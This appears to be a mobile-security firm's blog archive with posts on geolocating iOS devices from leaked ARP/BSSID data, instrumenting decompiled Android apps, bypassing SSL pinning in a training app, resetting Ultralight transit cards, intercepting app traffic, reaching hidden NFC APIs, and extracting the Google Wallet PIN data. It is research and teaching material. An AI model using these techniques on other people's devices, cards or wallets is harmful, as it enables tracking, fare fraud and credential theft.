Intrepidus Group

Category Archives: Tools

iSniff your Wi-Fi and GPS your House

Posted: May 10, 2013 – 9:52 am | Author: | Filed under: Geolocation, iOS, Privacy, Risk Analysis, Tools, Wireless

It’s been a while since I thought much about location-based services on iOS systems, in particular their privacy implications. Of course “Locationgate” happened back in March 2011, when researchers called public attention to a database of location points saved on iPhones. A year later, Mark Wuergler reported on a possible information leak where iOS devices disclosed the MAC addresses (more properly, BSSIDs) of the last few access points they’d linked to.

These two issues were brought together last summer, at the Black Hat Arsenal, when Hubert Seiwert (@hubert3) presented a tool called iSniff GPS. The tool was described in more detail at Syscan in Singapore just a couple of weeks ago, but finally came to my attention in a tweet Wednesday night pointing me to SC Magazine (Australia).

Intrigued, I spent some time yesterday installing the iSniff tool and putting it through its paces, and have a few thoughts I’d like to share.

You can easily map access points by name using queries to the WiGLE database.


The iSniff GPS tool contains two main components: A sniffer, and a GUI. The sniffer watches for leaked ARP packets, identifies the BSSIDs they’re probing for, and fetches information about them from Apple. The web-based GUI (built on Django) shows you the devices that have been “noticed” on the local network, and lists networks those devices have visited. When a probed network was matched in Apple’s database, a link will also take you to a visualization of all the data Apple has on file regarding that access point’s location.
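The sniffer side of this is conceptually simple. As a rough sketch (pure stdlib with a hand-built frame; iSniff GPS itself sniffs live traffic with a capture library), pulling the interesting fields out of a leaked ARP request might look like:

```python
import struct

def parse_arp_probe(frame: bytes):
    """Parse an Ethernet II frame carrying an ARP request and return
    the fields a sniffer like this would care about."""
    eth_dst, eth_src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != 0x0806:          # not ARP
        return None
    # ARP payload: hw type, proto type, hw len, proto len, opcode,
    # sender hw addr, sender IP, target hw addr, target IP
    (htype, ptype, hlen, plen, op,
     sha, spa, tha, tpa) = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    if op != 1:                      # only ARP requests
        return None
    fmt = lambda b: ":".join(f"{x:02x}" for x in b)
    return {
        "sender_mac": fmt(sha),
        "target_mac": fmt(tha),      # a previously-seen router MAC in unicast probes
        "target_ip": ".".join(str(x) for x in tpa),
    }

# Hand-built sample: device 02:00:00:00:00:01 probing for a router
# aa:bb:cc:dd:ee:ff at 192.168.1.1 (values are made up for illustration)
sample = (bytes.fromhex("aabbccddeeff") + bytes.fromhex("020000000001") +
          b"\x08\x06" +
          struct.pack("!HHBBH", 1, 0x0800, 6, 4, 1) +
          bytes.fromhex("020000000001") + bytes([192, 168, 1, 23]) +
          bytes.fromhex("aabbccddeeff") + bytes([192, 168, 1, 1]))
info = parse_arp_probe(sample)
```

The target hardware/protocol addresses are what get looked up against Apple’s database.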

After installing the tool, I took an old access point, connected my laptop directly to it, and joined a few iOS devices to see what happened. The tool was definitely working as designed — devices immediately appeared in the list, along with a list of BSSIDs each client probed for. Clicking on each client in the list displays a detail screen with latitude and longitude for each network BSSID found in the Apple DB, and a link to display the information on a map. Another tab pivots the data, listing it by network (with the relevant clients next to each), while other tabs offer direct mapping of selected BSSIDs and even searching and mapping of the SSID database.

Clients detected, and the APs they queried for (anonymized, obviously).


Interestingly enough, none of the access points the devices queried were in Apple’s database. The access point at work was found in the WiGLE DB (listed both by name and BSSID), but not in the Apple DB. My home access point didn’t show up in either database, despite having several iOS devices connecting on a daily basis, not to mention multiple visiting family members, most of whom have iOS devices as well. [Note: Not entirely correct, see update below.]

However, another network in the building did show up in Apple’s DB, and I was also able to accurately geolocate several access points near our sister company (iSEC Partners) in Manhattan. Perhaps there hasn’t been enough traffic near our building in the year since we moved in, and we simply haven’t been reported frequently enough to be included in the database?

The red dot is where Apple thinks the AP is (it's actually inside the left edge of the nearby building)


That’d be a great theory, except that the BSSID for the access point I was testing with also appeared in the Apple DB. That seemed really odd, since this AP is almost never on, and when it is, it’s rarely for more than a few days at a stretch, and almost never accessed by anything other than my own devices. Occasionally it’ll be set up as “attwifi” for testing, and I’ll get a few people in doctors’ offices connecting (and enjoying free internet access), but that’s probably no more than a dozen devices, all told, ever. Finally, the AP gets brought to the beach every year (and lots of people use it there) but that’s obviously a totally different location, and even then, not more than a couple dozen additional devices. And again, only for a week.

So why is an access point that’s been active 24×7 for over a year not in the database, while another one, in use for maybe 3 or 4 weeks of total time over the same year (and one of those weeks in a different state), is in it? There’s definitely some odd criteria in play here that I haven’t yet been able to guess at.

What does all this mean? It’s clear that the Apple BSSID database has real utility: it helps devices determine where they are quickly and more accurately. There might be a way for Apple to restrict how queries are performed against the database, but doing that effectively could be difficult. And of course, Apple isn’t the only entity maintaining such a database. Keeping your AP information out of every publicly-accessible database just isn’t going to happen.

On the other hand, the leakage of the BSSID data when a device joins another network is a little harder to justify. What exactly is the utility the user gets from this? A faster recognition by the device that it’s on a network it knows? What services benefit from this, and to what degree? It may well be acting in accordance with RFC 4436, but that doesn’t necessarily make it right (and very few, if any, Android devices exhibit the same behavior).

Ultimately, the real question is whether the daily benefit to the end user outweighs the risk that the location of their home, or school, or workplace, might be disclosed to an eavesdropper at a coffee shop. Which, in a strict risk analysis, probably falls far short of requiring elimination of the leakage. Perhaps it could be mitigated with a user preference setting, but this problem is pretty esoteric even for information security researchers, and I suspect clearly describing the problem (and its implications) to the average user in the space of a few lines on a preference pane would be flat-out impossible.

At any rate, this is a very interesting demonstration of fusing publicly-accessible data from multiple sources to gain information not otherwise explicitly revealed. And that in itself definitely makes the iSniff GPS tool worth checking out.

Quick Update, 5/13/2013: I was out of town over the weekend, but now have done a little more checking, based on Hubert’s comments below and on Twitter.

Turns out, of the two networks at work (open/guest and closed/employees), one of the guest BSSIDs is in Apple’s DB, but none of the closed BSSIDs are, which still seems odd to me. Of the four neighboring businesses’ BSSIDs checked, all four are in Apple’s DB. And I looked again for my home AP, and it was in there — I’d been querying the wrong MAC address. :(

So the AppleDB is a little more complete than I’d thought, though there’s still something keeping our main work net from showing up.

And I also verified that the ARP queries being sent out by iOS devices upon joining the network are not for our local APs, but for the router / DNS server (which are both the same here). So for places where the router / DNS is also the Wi-Fi access point (many, many places), the ARP disclosure can lead to geolocation via Apple’s DB. But where the Wi-Fi and router / DNS are split to multiple devices, it’s a bit harder to find.


APKTool, make me a logcat sandwich

Posted: March 8, 2013 – 2:57 pm | Author: | Filed under: android, Mobile Device Management, Mobile Security, Reverse Engineering, Tools

I recently turned a few friends on to Zed Shaw’s “learn python the hard way” course and it reminded me how bad of a programmer I can be. In fact, I’m that guy who litters his code with print statements. So it’s probably no shock, then, that a lot of times when I’m trying to figure out what’s going on in an Android app we’re reversing, I’ll want to drop in some print statements. I used to do this by adding a few lines of smali directly into a class file, but there were a few things I needed to deal with for that to work the way I wanted. For example, here is what the default “debug” log call looks like in smali.
invoke-static {v0, v1}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I
If you were going to drop this line into the code somewhere, you would need to make sure both v0 and v1 are Strings. I would typically want "v1" to be the string I wanted logged, and "v0" (in this example) to be the log “Tag” value, so I knew where I was in the code when it was dumped to the log (I may have a dozen or so values getting logged, so this helps keep things straight when you see them in the logs). Setting up this Tag string without stomping on other registers sometimes meant I needed to increase the local variable count, add some lines to set the string, and then make sure I had the registers correct in that logging line. This worked all right if it wasn’t too late at night or I had enough caffeine in me, but I would typically screw something up and end up recompiling a bunch of times. I wanted an easier way, and something that could log things that weren’t already strings.

Thus I created this simple class file I can drop into the root of any application (yes, this is not as good as a real debugger using JDWP, but sometimes doing things quick and dirty gets the job done quicker for me). I wanted to stay with the Android log utility syntax, but simplified a few things. I overloaded the logging object’s “d” method so that it could take just about any variable type I was dealing with. One handy example of this is byte arrays (which are often what we find decryption keys stored in). The wrapper in IGLogger will convert the byte array into a hex string and dump that to the logs. All you need to add is one statement to the code. If "v0" contained a byte array we wanted printed out, just drop in this line of code.
invoke-static {v0}, Liglogger;->d([B)I
Since “iglogger.smali” is in the root of the recompiled APK, we can statically invoke it from any other class in the project. In this case, we need to tell the “d” method that v0 is a byte array (“[B”) and, sticking with the standard Android logging utility class, we’re returning an Integer (although I’ve thought about just making that a Void… I never check it). You may notice we’re not passing a log Tag variable with this statement. IGLogger supports that if you want, but we’ve added a trick to IGLogger that I find works pretty well: IGLogger will create a new Throwable object, call its getStackTrace method to find out the last class and method we were in, and put that in our log Tag. If the APK is not obfuscated, this will even include a line number. The same trick allows a very simple “hey, I got here and this is how” stack trace to be dumped by placing this one line of code anywhere.
invoke-static {}, Liglogger;->d()I
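The caller-derived tag trick translates to other languages, too. Here is the same idea sketched in Python using the inspect module (IGLogger itself does this in smali/Java via Throwable and getStackTrace; the function names below are just for illustration):

```python
import inspect

def d(msg):
    """Log helper that derives its tag from the calling frame,
    analogous to IGLogger's new-Throwable/getStackTrace() trick."""
    caller = inspect.stack()[1]
    tag = f"{caller.function}:{caller.lineno}"   # method name + line number
    line = f"{tag}: {msg}"
    print(line)
    return line

def check_password(candidate):
    # Any call to d() here gets tagged "check_password:<line>"
    return d(f"comparing {candidate!r}")

result = check_password("hunter2")
```

No tag needs to be threaded through the call sites, which is exactly why it keeps the injected smali to one line.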
You might have heard a lot of us here are fans of Virtuous Ten Studio for working with smali. I have a bunch of these IGLogger print statements in Extras->Smali->CodeSnippets, which makes it really simple to just click and drop in a log statement.

But that wasn’t good enough for Niko here when we had a massively huge app that was obfuscated. He talked me into automating the process of logging each class and method that was entered, so we could watch the logs and know what code paths were being taken. I ended up rolling this into a Python script I had written to “fix strings” in decompiled Android apps. You are probably aware that proper Android apps will have their strings placed into XML files so that it’s easier to internationalize the application. While this might be nice for developers, it means that when we’re reversing an application, we may end up with some strange hex value instead of a readable string. The script would loop through the decompiled code and add these strings back in as a comment tag whenever they showed up in the smali code. Your mileage may vary with how well this works, but in some apps, it helped us find things easier.
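A minimal sketch of the “fix strings” idea (the resource-ID table and the regex here are simplified assumptions; the real script works against apktool’s decompiled tree):

```python
import re

# Hypothetical mapping, as would be parsed from res/values/public.xml
# plus res/values/strings.xml in the decompiled app
STRINGS = {0x7F040001: "Enter your password"}

def annotate_strings(smali: str) -> str:
    """Append the looked-up string as a smali comment wherever a
    string resource ID constant appears in the code."""
    def repl(m):
        res_id = int(m.group(1), 16)
        if res_id in STRINGS:
            return f"{m.group(0)}    # \"{STRINGS[res_id]}\""
        return m.group(0)
    # Match const / const/high16 loads of 0x7f...-style resource IDs
    return re.sub(r"const(?:/high16)?\s+[vp]\d+,\s+(0x7f[0-9a-fA-F]+)",
                  repl, smali)

sample = "    const v0, 0x7f040001"
annotated = annotate_strings(sample)
```

Since `#` starts a comment in smali, the annotated file still recompiles cleanly.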

Adding on to that code base, I started to include some code to automatically add IGLogger statements around things I thought could be interesting. This includes a log statement after the “prologue” of any method. Also, any time we see two strings being compared, we’ll log both strings (this is always fun for watching a password being checked or when the app pulls up device info to see if it’s running on the right hardware). We plan to add a few more things for dumping Intent messages and URLs, but this is a start for now.
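The method-entry logging can be sketched like this (a simplified stand-in for the real script, whose smali handling is more involved):

```python
LOG_LINE = "    invoke-static {}, Liglogger;->d()I"

def inject_prologue_logs(smali: str) -> str:
    """After every '.prologue' directive, insert a parameterless
    IGLogger call so each method entry shows up in logcat."""
    out = []
    for line in smali.splitlines():
        out.append(line)
        if line.strip() == ".prologue":
            out.append(LOG_LINE)
    return "\n".join(out)

sample = """.method public run()V
    .locals 1
    .prologue
    return-void
.end method"""
patched = inject_prologue_logs(sample)
```

Because IGLogger derives its tag from the stack trace, the injected call needs no per-method customization.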

This of course will make the app run hella slow, fill up logcat, and in some cases break the application. I’ve tried to avoid that last one as best I can for now, but it is possible this script will massacre an APK so badly it will be unrunnable. If you run into that issue, you can turn off the lines that add these automatic logging statements to the code (i.e., JonestownThisAPK = False).

The last thing we added to the Python script was some searches to pull out info we may find interesting when assessing an APK file. We dump this into a file called “apk-ig-info.txt” and review it after decompiling the APK. Again, this is something we’re continuing to refine. You can find the code on the Intrepidus Group github repo:



Armor for Your Android Apps – ShmooCon follow-up

Posted: February 27, 2013 – 1:26 pm | Author: | Filed under: android, Conferences, Fun and Games, Mobile Security, Tools

Hopefully, everyone’s already decompressed from all the Shmoocon partying by now. I wanted to follow up on the IG Learner app that I presented during my “Armor for your Android Apps” talk and give out a couple of tips on how to approach cracking the challenges (which aren’t all that hard, really).
Before I dive into the meat of the lessons, I just wanted to point out that if you didn’t attend the conference but still want the app, you can get it from the Play Store:


So, you’ve got everything installed and running. At this point you have two options – take the easiest way and hit the walkthrough or try to dig through the lessons yourself. I intended for the walkthrough to serve as a helper thing, but if you’d like to just use it to run through the whole thing, sure, that’s an option, too. The link to the walkthrough is provided at the end of this post.

And if you want to do it yourself but are not sure where to start, here are a few general tips:

1. You will end up using Android SDK / Android monitor (monitor.bat) very heavily. I am guessing that by now you have that installed on your system anyway.

2. Use dex2jar ( to convert an APK’s Dalvik executables (*.dex) into their Java representation – since the code is not obfuscated, this will really help you understand the logic of the lessons.

3. Apktool ( – this command-line utility lets you decompile APKs and recompile them back. You’ll definitely need this on a few occasions.

4. Jarsigner – comes with the Java SDK; an APK must be signed before it can be installed on an Android device. Read here about signing of APKs:

5. Virtuous Ten Studio ( – a Smali IDE, complete with syntax highlighting, automatic signing, and APK upload. Awesomeness redefined. If you want to bypass 3) and 4) and not have to deal with them, go the VTS way. That said, I’d still recommend familiarizing yourself with the command-line versions of the tools – just so you better understand what’s happening behind the scenes.

6. Some knowledge of Java is definitely helpful for quick completion of challenges.

7. “adb shell pm list packages” gets you the list of packages installed on the phone. IG Learner is one of them.

Now, let’s go to some specific tips per lesson:

1. Lesson 1. This one is pretty self-explanatory. If you start the Android monitor and look at the log output,  you’ll see the answer to the challenge. Easy as that.

2. Lesson 2. Convert the APK into Java and try to figure out the filename that’s being created. Another hint: default directory for Android app file storage is /data/data/<packagename>/files.

3. You can figure out what the URI scheme is just by looking at the lesson screen and requesting a URI. Now look through the decompiled code (either the Smali or the Java representation) to figure out what the lesson is expecting. Also, pay attention to extra activities in the app.

4. You should use a local proxy to intercept application traffic (Burp Suite, maybe?). Keep in mind that you can’t man-in-the-middle SSL traffic unless the device trusts the SSL certificate presented by your proxy. For that (at least for Lesson 4), you need to add your local proxy’s signing certificate to the device’s trusted CA store. Once you export that certificate (there are multiple ways to do it; Internet Explorer’s certificate export wizard is one of them), you should be able to import it into the trusted CA store by placing it in the root of /sdcard and importing it through Android’s Trusted Credentials menu.

5. This lesson is a bit trickier. For one way to solve it, I suggest looking through the Smali code and finding the pin for the SSL certificate, which you can get by running Moxie Marlinspike’s script on our certificate. Then you can replace this pin with your own intercepting proxy certificate’s pin, recompile the app, and push it back to the phone. You’re good to go.

6. Hard-coded keys are awful. Seriously. When you’re playing around with symmetric encryption and trying to find the correct value of the encrypted string, make sure you convert the result to Base64 for readable output. The logging facilities are there to help you.
The encryption can be done in less than 10 lines of Java code. If you’re struggling with that, check out our GitHub repository for a helper Java class.

7. Content providers are advertised in the Manifest. Mercury ( is a great framework that lets you easily query those providers. This should be enough to successfully complete the challenge.

8. I’d recommend starting with decompilation of the app and looking at the Lesson8Activity. This may give you an idea of what the Intent handler is expecting. From there you can either download the Lesson8Aux app from the Play Store (, decompile it, and modify it to throw the correct Intent at the application, or just use the “am” command to do the same. Whichever is easier for you is fine, but I recommend going the auxiliary-app route just to get some more practice decompiling and recompiling Smali code.
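The Base64 point from lesson 6 can be sketched quickly. This is Python for brevity, and the XOR “cipher” is only a stand-in (the stdlib has no AES; the lesson itself uses real symmetric crypto), but the readable-logging idea is the same:

```python
import base64

def xor_encrypt(data: bytes, key: bytes) -> bytes:
    """Stand-in 'cipher' for illustration only; XOR is symmetric,
    so the same function decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

ciphertext = xor_encrypt(b"secret challenge string", b"hardcoded-key")

# Raw ciphertext bytes are unprintable; Base64 makes them log-friendly
readable = base64.b64encode(ciphertext).decode("ascii")

# Round-trip: decode the logged Base64, then decrypt
recovered = xor_encrypt(base64.b64decode(readable), b"hardcoded-key")
```

Log the Base64 string, not the raw bytes, and you can copy it straight out of logcat.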

Oh, and yeah, the walkthrough (Huge thanks to our intern Nitin for putting it together!). Here it is:




Getting ready for ShmooCon

Posted: February 12, 2013 – 1:20 pm | Author: | Filed under: Conferences, Cryptography, Fun and Games, Tools

It’s almost time for another ShmooCon, and as usual, we’ll be out in force for the conference. We won’t have a booth this year, but we will be milling about, attending talks, and even giving a couple presentations of our own. We might even have a little puzzle to share…just ask any one of us for details. (David might have a slightly more visible puzzle contest as well, but, well, there were secrecy oaths, threats of retribution, etc., so the less said about that, the better).

Be sure to check out our talks, too. Roman Faynberg will be presenting Armor For Your Android Apps, Saturday at 3:00, a discussion of Android vulnerabilities, with plenty of real-life examples and hair-raising war stories, as well as tips and best practices to avoid such problems in development. There’s even a HackMe-type app to help demonstrate some of the problems.

At exactly the same time (sorry, we couldn’t control it!), David Schuetz will be presenting on Protecting Sensitive Data on iOS Devices. His talk will try to cut through some of the technical mumbo-jumbo and present best practices for configuration, management, and application development on iPads and iPhones, with the goal of making it easy to explain to management types.

We’re also hiring! Current openings for [testers | consultants | ninjas | pirates] (sorry, no open positions for samurai or lumberjacks). If you’re interested, chat with one of us at the con, or send us an email at

So if you’re going to be at ShmooCon, stop us in the halls and have a chat. We can’t wait to see you!


UltraReset – Bypassing NFC access control with your smartphone

Posted: September 21, 2012 – 8:24 pm | Author: and | Filed under: android, bugs, Conferences, Mobile Security, NFC, RFID, Tools

We were just in Amsterdam to present our research on uses of NFC for physical access control. The two main industries we focused on were transit and hotel systems. Ever since Intrepidus got us Nexus S phones with NFC early last year, we’ve been looking for real world uses of NFC on our trips. We discovered the flaw with the SF Muni Ultralight cards last year on a trip there and followed up with informing them of the issue in December. At the time, we had to take the cards home and use an NFC reader connected to a laptop to do testing. Since then, things have changed; the Android API supports reading from and writing to most Mifare NFC cards, Ultralights included.

Some of the coverage of this has confused all NFC transit systems with the ones using Mifare Ultralight cards incorrectly. In our presentation, we listed several cities that we know have NFC transit systems as an example of how widespread the technology is becoming. We listed two cities using Mifare Ultralight cards incorrectly that we have 1) tested and 2) contacted with remediation details.

For those of you that missed the video, we have it posted here:

UltraReset Screenshot

UltraReset resetting an Ultralight transit card

The card in the video was a NJ PATH 10-trip Ultralight card. When we tap the card to the phone, our application reads all the data in pages 4 to 15 from the card and stores it on the phone (we also store the card’s UID, which we’ll write more about next week on hotel card issues). We then tap the card between two turnstiles (which is why the count jumps by two). Once the 10 trips on the card have been used up, touching it back to the phone causes the application to write the saved data back to the card. And with that, the card looks to be back in its original state, as purchased, with 10 rides remaining.

While these Ultralight cards don’t have the access control features found in more expensive NFC cards, they do support a feature called a “One Way Counter” (named One Time Programmable, or “OTP,” in earlier documents). These bits are in page 3 of the card’s data, and once a bit is turned on, it can never be turned back off. This way, a card can be limited to a fixed number of uses. Both of the transit systems we looked at that use Ultralight cards leave these bits unchanged.
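The one-way counter semantics can be modeled in a few lines. This is only a sketch of the OR-only behavior described above (not NXP’s implementation), but it shows why a write-back “reset” cannot clear a punched bit:

```python
class OneWayCounter:
    """Model of the Ultralight OTP page: bits may only ever be set.
    Writes are OR-ed into the stored value, never cleared."""
    def __init__(self):
        self.bits = 0x00000000

    def write(self, value: int) -> int:
        self.bits |= value & 0xFFFFFFFF   # the hardware ORs the write in
        return self.bits

otp = OneWayCounter()
otp.write(0x00000001)                 # a ride punches a bit
after_reset = otp.write(0x00000000)   # replaying the original blank page
```

If the transit systems punched an OTP bit per ride, replaying the saved page data would leave the counter untouched, and the card would still read as used up.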

Ultralight Card OTP values

The one way counter (OTP) values of the NJ Path card (top) and SF Muni (bottom). Neither system changes these bits when the card is used.

We know a number of cities are looking to roll out contactless technology, and we hope we can bring attention to this issue so that it is implemented correctly in the future. One of the points we also raised in our talk is that full card emulation on smartphones is likely to happen soon. When it does, a number of NFC-based access control systems may need to be re-evaluated.

If you think your system might be vulnerable to this issue, we have put an Android application in the Play store which will read and compare the one way counter (“OTP”) on Ultralight cards. Note that the standard cards you might get from transit systems typically are not Ultralights; Ultralights are typically only used for “disposable” or “limited use” type tickets.

We have been reading lots of insightful comments on the articles we’ve seen. Please feel free to post questions or comments here and we will do our best to answer them (and no, we’re not planning to release the full UltraReset application). Last but not least, we would like to thank dragos and crew for having us at another one of the SecWest events — it’s always great to catch up with folks in the industry and hear talks in the single-track format. Thanks!

~Corey and Max


Android Network Analysis Redux

Posted: June 27, 2012 – 2:17 pm | Author: | Filed under: android, Tools

There are a lot of ways to do network analysis of mobile apps. Probably too many. There is no right answer, but some solutions will be better than others depending on how the app is developed and what type of traffic you want to analyze. This post is a summary of some ways you can set up your environment to perform network analysis on a mobile app.

The options (that I can think of):

  1. PPTP server – redirects traffic through the PPTP server, which can then intercept and tamper with the traffic accordingly.
  2. Wireless AP – you setup a wireless AP on your laptop and bridge the traffic between it and a wired connection.
  3. ICS Wifi Proxy – Android 4.0+ supports HTTP proxies over wifi, but it only applies to traffic from the built-in browser.
  4. ProxyDroid – on rooted devices, the app will use iptables to forward traffic to a proxy (HTTP,SOCKS, etc) of your choice.
  5. Manual iptables – again for rooted devices only: create iptables rules on the device to forward traffic where you want it. It takes a long time to set up, but works OK.
  6. Poisoning – arp poisoning, dns poisoning, DHCP exhaustion, whatever. Redirect outbound traffic to a host of your choosing using network attacks. Not really feasible but I’ve seen people try.
  7. APK hacking – recompile an APK to force requests to go to a different host. Works great when you need it to but it can be unstable and time consuming to get working correctly.
  8. Emulator HTTP proxy – load the app into an emulator and redirect traffic to an HTTP proxy. Works well, but sometimes apps won’t allow themselves to be run on an emulator.

There are a lot of factors in deciding which hack is right: Is the mobile app doing SSL? Can I run it in a proxy? Do I have root on my device? Am I onsite with the client? Am I in the office? Do I have nothing better to do than spend the next 10 hours getting my environment setup?

This is a table that covers different ways you can set yourself up to analyze network traffic. Some of these are horrible ideas and are put down just to add to the list.

This is by no means scientific, and my opinions alone, so there may be more questions raised by this thing than answers. But for the purposes of this blog post, this is accurate…enough..ish.


ProxyDroid: This is, in my opinion, the best bang for the buck: it sets up in minutes, forwards traffic to BurpSuite (which for me is most likely already running), and you can start analyzing HTTP/S traffic right away. I will admit that the fact that it sets up in minutes and works with existing web hacking tools is 90% of the reason why I like it. The other thing that works well: because Android’s security model gives every app a unique UID, ProxyDroid can make iptables rules for specific UIDs. This means you can proxy just the traffic from a single app instead of the entire device.
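To illustrate the per-UID idea, here is a small generator for the kind of rules involved (hypothetical rules for illustration, not ProxyDroid’s exact implementation; the UID and addresses are made up):

```python
def proxy_rules(app_uid: int, proxy_ip: str, proxy_port: int):
    """Build illustrative iptables rules that match outbound TCP by
    the owning app's UID and DNAT it to an intercepting proxy."""
    base = ("iptables -t nat -A OUTPUT -p tcp -m owner "
            f"--uid-owner {app_uid} --dport {{port}} "
            f"-j DNAT --to-destination {proxy_ip}:{proxy_port}")
    # One rule each for plain HTTP and HTTPS
    return [base.format(port=p) for p in (80, 443)]

rules = proxy_rules(10059, "192.168.1.100", 8080)
```

The `owner` match is what scopes the redirect to one app’s UID rather than the whole device.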

Wireless AP: This setup works well and it’s what I used for a long time. A common setup is where you use your laptop as a wireless access point, connect the Android device, and bridge the connection to a wired network. In the middle you can use Mallory or BurpSuite to analyze the traffic. This is similar to the PPTP server setup discussed below in that you’re making iptables rules to handle the traffic, and forwarding it to your analysis tool of choice.

PPTP Server: Setting up a PPTP server and forcing an Android device to connect to it works great for just about any type of mobile test. All of the network traffic, whether it’s HTTP or some weird non-standard protocol, will pass over the connection, making it great for non-HTTP apps. Once it’s set up, you can turn it into a pretty stable solution. The long setup time can be improved with scripts, and it can be buggy if you aren’t comfortable with network configurations. But in general, a good option. This is the recommended setup for Mallory, FYI.

I’ll be going a little more in-depth on using BurpSuite with ProxyDroid in the next post, because there are some small configuration issues to take into account. If you use something that I’ve missed or something that works better for you, let me know in the comments or send me an email: mark.manning@… you know.


Java Reflection in Android…FTW

Posted: April 13, 2012 – 11:57 am | Author: and | Filed under: android, Conferences, Mobile Security, NFC, Reverse Engineering, RFID, Tools

I’ll be hitting a few smaller security conferences this spring (whatup BeaCon and BSidesROC) with a turbo talk on how Java reflection can be useful for accessing hidden APIs in Android. The team at Gibraltar had some great posts on this last year, but getting reflection to work for accessing the NfcAdapterExtras and NfcExecutionEnvironment classes was not as straightforward as things seemed. Here are some tips on how to get it working (at least on a Gingerbread Nexus S).

First, you want to get familiar with the nfc_extras framework. This is not included in the standard Android SDK, but you can either pull the /system/framework/ file from a device or look at the Android source. You’ll see there are two classes: NfcAdapterExtras and NfcExecutionEnvironment. What I really wanted was the embedded NfcExecutionEnvironment, but the proper way to get that object is NfcAdapterExtras.getEmbeddedExecutionEnvironment(). So we’ll need to create that object and method first.

I decided to use reflection to access these classes in my own Android application. Since they’re not in the SDK, I couldn’t just import com.android.nfc_extras.NfcAdapterExtras in my code. Instead, we’ll ask for that class by name at runtime.

String sReflectedClassName = "com.android.nfc_extras.NfcAdapterExtras";
Class cReflectedNFCExtras = Class.forName(sReflectedClassName);

Wow, that’s pretty easy. Except that we also need to tell the Dalvik VM to load the additional nfc_extras framework so that it knows about that class. To do that, add the following inside the application tag in the AndroidManifest.xml file of your application.

<uses-library android:name="com.android.nfc_extras" android:required="true" />

Now back to our “cReflectedNFCExtras” class. The first thing we’ll need to do is get the singleton NfcAdapterExtras object, which is returned by the get(NfcAdapter paramNfcAdapter) method. Note that it takes an NfcAdapter as a parameter, so we have to specify that class when looking up the method. The following line should work for that.

Method mReflectedGet = cReflectedNFCExtras.getMethod("get", Class.forName("android.nfc.NfcAdapter"));

However, at first I had a mistake in my code that caused this method not to be found (thanks to Jeremy for fixing this). So instead, I looped through all the methods using getDeclaredMethods() and stopped when the “get” method we wanted was found. Here’s the code for doing that, followed by invoking the method and passing it the default NfcAdapter, which is the next thing we’d want to do.

Object oReturnedNFCExtras = null;
Method mReflectedMethods[] = cReflectedNFCExtras.getDeclaredMethods();
for (int i = 0; i < mReflectedMethods.length; i++) {
   Log.d("NfcAdapterExtras METHOD:", mReflectedMethods[i].getName());
   if (mReflectedMethods[i].getName().equals("get")) {
      // Standard default NfcAdapter... need to pass this in to get back the singleton
      NfcAdapter defaultAdapter = NfcAdapter.getDefaultAdapter(this);
      oReturnedNFCExtras = mReflectedMethods[i].invoke(cReflectedNFCExtras, defaultAdapter);
      break;
   }
}

From here on out, it's smooth sailing as long as you take care of one more thing. Your application needs a special permission in order to use this framework: "NFCEE_ADMIN". The problem is that this permission is declared with a protectionLevel of "signature" in the system NFC package. There are a few ways to get around this, but as far as I know, they all require root on the device. Thus, even though we're using reflection to access these classes, Android's permissions are still enforced. My way of dealing with this was to resign that package with the same certificate I used to sign my newly created Android application, then add the following line to my application's AndroidManifest.xml:

<uses-permission android:name="com.android.nfc.permission.NFCEE_ADMIN" />

So there you go. We can now be NFCEE_ADMINs as well (on our own rooted devices) using reflection. I'm curious to try this out with other /system/framework packages as well. In most cases, the process should be more straightforward:

  1. Load the class using Class.forName("package.ClassName")
  2. Find the method using getMethod("methodName", paramTypes) on that Class object
  3. Invoke the method with the proper parameters



Google Wallet PIN Brute Forcing

Posted: February 9, 2012 – 10:46 am | Author: , and | Filed under: android, Mobile Security, NFC, Tools

Google Wallet is a project of great interest right now, as it represents a big shift in how we pay for goods and services in the US (Japan is quite far ahead of everyone on mobile payments). Researchers have discovered that Google Wallet stores the PIN for your wallet on the device in a relatively insecure format. Since this information was already released into the wild, we felt we should share our perspective and how we would approach this problem. The PIN data is stored in the application's SQLite database.

The SQLite database is stored in the Google Wallet data directory. Google Wallet stores the PIN in the proto column of the metadata table. The data is encoded using the protobuf format (also by Google). The following SQL query retrieves the data:

select hex(proto) from metadata where id = "deviceInfo";
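If you've pulled the database off a (rooted) device, that query is easy to drive from Python's sqlite3 module. A minimal sketch, using an in-memory stand-in table since the real database file name and location vary:

```python
import sqlite3

# Illustrative stand-in: on a real rooted device you would copy the wallet's
# SQLite file out of its data directory and connect to that file instead.
conn = sqlite3.connect(":memory:")
conn.execute("create table metadata (id text, proto blob)")
conn.execute("insert into metadata values ('deviceInfo', x'08AC02')")

# Same query as above: pull the protobuf blob out as hex
row = conn.execute(
    "select hex(proto) from metadata where id = 'deviceInfo'").fetchone()
proto_bytes = bytes.fromhex(row[0])   # raw protobuf blob, ready for decoding
print(row[0])   # 08AC02
```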

This query retrieves the protobuf data, which encodes a number of device- and user-specific fields. Protobuf is a data serialization format, similar in concept to JSON. Next, the data must be deserialized. The standard way to work with protobuf data is to define a .proto file, which acts as a key for deserialization. These .proto files get compiled down to application-specific code and are not shipped in a human-readable format. Raj decided to write a generic protobuf decoder (Protobuf Easy Decode). This Python module can decode protobuf data without a .proto file, although some information (such as field names) is inevitably lost when reading raw protobuf data this way.
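To get a feel for what decoding raw protobuf means, here's a minimal illustrative decoder (my own sketch, not Raj's module): every protobuf field starts with a varint key packing the field number and wire type, so you can walk the blob and recover field numbers and values even without a .proto file.

```python
def read_varint(data, pos):
    """Decode one base-128 varint starting at pos; return (value, new_pos)."""
    result = shift = 0
    while True:
        b = data[pos]
        result |= (b & 0x7F) << shift
        pos += 1
        if not b & 0x80:
            return result, pos
        shift += 7

def decode_fields(data):
    """Walk a protobuf blob, returning (field_number, wire_type, value) tuples.
    Handles varint (0) and length-delimited (2) fields -- enough to see the
    structure of unknown data; field *names* are unrecoverable without .proto."""
    pos = 0
    fields = []
    while pos < len(data):
        key, pos = read_varint(data, pos)
        field_no, wire_type = key >> 3, key & 0x07
        if wire_type == 0:                    # varint
            value, pos = read_varint(data, pos)
        elif wire_type == 2:                  # length-delimited (bytes/strings)
            length, pos = read_varint(data, pos)
            value = data[pos:pos + length]
            pos += length
        else:
            break                             # other wire types omitted here
        fields.append((field_no, wire_type, value))
    return fields

# Example blob: field 1 = varint 150, field 2 = bytes "hi"
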